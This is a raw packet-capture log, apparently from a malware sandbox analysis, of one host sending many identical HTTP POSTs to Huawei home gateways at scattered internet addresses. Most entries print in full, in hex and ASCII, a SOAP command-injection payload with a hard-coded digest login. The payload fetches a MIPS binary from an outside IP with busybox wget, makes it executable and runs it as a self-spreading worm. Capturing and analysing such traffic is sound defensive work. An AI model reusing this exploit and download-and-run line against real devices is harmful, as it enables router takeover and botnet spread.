69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  161192.168.2.1355972157.208.219.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663770914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  162192.168.2.1343860138.222.13.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663811922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  163192.168.2.1336414197.134.53.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663826942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  164192.168.2.1352264157.92.98.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663827896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  165192.168.2.1341432208.163.211.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663851976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  166192.168.2.1352742111.54.204.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663877964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  167192.168.2.135269041.146.103.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663911104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  168192.168.2.1360986158.252.74.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663943052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  169192.168.2.1354498186.175.55.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.664132118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  170192.168.2.1338100148.173.115.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.664196014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  171192.168.2.1336192157.24.255.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.664237022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
